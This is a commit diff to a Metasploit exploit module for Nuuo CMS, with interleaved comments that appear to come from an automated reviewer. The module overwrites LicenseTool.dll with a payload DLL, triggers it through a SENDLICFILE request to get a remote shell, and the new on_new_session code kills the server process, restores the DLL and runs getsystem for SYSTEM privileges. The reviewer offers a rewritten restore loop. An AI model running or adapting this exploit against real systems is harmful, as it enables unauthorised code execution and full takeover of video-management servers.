Repair CMS installation and use getsystem
parent
70b9110840
commit
9a068e9221
|
@ -4,7 +4,7 @@
|
|||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::Nuuo
|
||||
|
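Review bot: `Rank = ExcellentRanking` is hard to reconcile with what the module now does on a session: the `on_new_session` hunk below kills `NCS_Server.exe` and moves a DLL over the live `LicenseTool.dll`, and the non-meterpreter branch leaves the installation broken. Metasploit's ranking guidance, as I recall it, reserves Excellent for exploits that do not crash or disrupt the target service, so Great or Good with a comment on why would read as more honest; I would at least add `# Rank reflects reliability of the shell, not of the post-session repair, which is best-effort` above the constant.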
@ -19,7 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
characters. Therefore, this function can be abused to overwrite any files in the installation
|
||||
drive of CMS Server.
|
||||
|
||||
Note that this exploit will destroy the CMS installation - it will replace a key DLL!
|
||||
This vulnerability is exploitable in CMS versions up to and including v2.4.
|
||||
|
||||
This module will either use a provided session number (which can be guessed with an auxiliary
|
||||
|
@ -49,6 +48,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
print_warning("#{peer} - Please wait a bit while we clean up")
|
||||
client.sys.process.get_processes().each do |proc|
|
||||
if proc['name'] == "NCS_Server.exe"
|
||||
client.sys.process.kill(proc['pid'])
|
||||
sleep 5
|
||||
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
|
||||
client.sys.process.execute("NCS_Server.exe")
|
||||
print_good("#{peer} - Successfully restored LicenseTool.dll!")
|
||||
end
|
||||
end
|
||||
|
||||
# elevate privs to system (we're already Admin anyway), and we're done!
|
||||
client.run_cmd("getsystem")
|
||||
print_good("#{peer} - We should have SYSTEM now, enjoy your shell!")
|
||||
else
|
||||
print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll")
|
||||
print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
|
||||
print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!")
|
||||
print_good("#{peer} - Anyway, enjoy your shell!")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
login
|
||||
|
||||
|
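Review bot: `print_good("#{peer} - Successfully restored LicenseTool.dll!")` is printed regardless of whether the `move /y` actually succeeded: `shell_command_token` returns the command's output, which is discarded, and both the `move` and the following `execute("NCS_Server.exe")` use paths relative to the session's current directory, which nothing in this method establishes. If the session happens to be hosted inside `NCS_Server.exe` itself (the old comment in the next hunk talks about migrating before killing it), the `client.sys.process.kill(proc['pid'])` line would also tear down the session doing the repair; skipping the session's own pid via `client.sys.process.getpid` avoids that, though whether the payload runs in that process cannot be confirmed from the hunk. When no `NCS_Server.exe` process is found the loop also exits silently and the operator is never told the DLL was not restored. The rewritten restore loop below echoes the move output, guards the self-pid case and reports the not-found case; the getsystem step and the non-meterpreter branch are unchanged.
```ruby
    if client.type == "meterpreter"
      print_warning("#{peer} - Please wait a bit while we clean up")
      restored = false
      my_pid = client.sys.process.getpid
      client.sys.process.get_processes.each do |proc|
        next unless proc['name'] == "NCS_Server.exe"

        if proc['pid'] == my_pid
          print_warning("#{peer} - Session lives inside NCS_Server.exe, not killing it; migrate and restore #{@dll} manually")
          next
        end
        client.sys.process.kill(proc['pid'])
        sleep 5
        output = client.shell_command_token("move /y #{@dll} LicenseTool.dll")
        vprint_status("#{peer} - move output: #{output}")
        client.sys.process.execute("NCS_Server.exe")
        restored = true
        print_good("#{peer} - Successfully restored LicenseTool.dll!")
      end
      print_error("#{peer} - NCS_Server.exe not found, LicenseTool.dll was NOT restored") unless restored
      # … unchanged: getsystem and final messages …
```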
@ -56,15 +79,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS")
|
||||
end
|
||||
|
||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||
# and not nuke the CMS installation.
|
||||
@dll = rand_text_alpha(12)
|
||||
print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}")
|
||||
dll_data = download_file("LicenseTool.dll")
|
||||
upload_file(@dll, dll_data)
|
||||
|
||||
print_status("#{peer} - Uploading payload...")
|
||||
upload_file("LicenseTool.dll", generate_payload_dll)
|
||||
|
||||
print_status("#{peer} - Sleeping 15 seconds...")
|
||||
sleep 15
|
||||
|
||||
print_status("#{peer} - Sending SENDLICFILE request, shell incoming!")
|
||||
license_data = rand_text_alpha(50..350)
|
||||
data = send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||
"Content-Length: " + license_data.length.to_s], license_data)
|
||||
# In order not to destroy the Nuuo CMS installation, we should migrate the process, kill the NCS_Server process and replace the DLL
|
||||
end
|
||||
end
|
||||
|
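Review bot: `upload_file(@dll, dll_data)` stores the backup without checking that `download_file("LicenseTool.dll")` returned anything, yet `on_new_session` later moves that backup over the real DLL and reports success; if the download came back nil or empty (the Nuuo mixin's failure behaviour is not visible here), the "repair" would replace the DLL with an empty file while claiming to have restored it. A guard before the upload, `fail_with(Failure::Unknown, "#{peer} - Could not back up LicenseTool.dll, aborting to avoid destroying the CMS install") if dll_data.nil? || dll_data.empty?`, keeps the install intact when the backup cannot be taken. The hard-coded `sleep 15` would also be clearer as a datastore option or at least a comment saying what the delay waits for. The `exploit` method starts in the previous hunk.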
|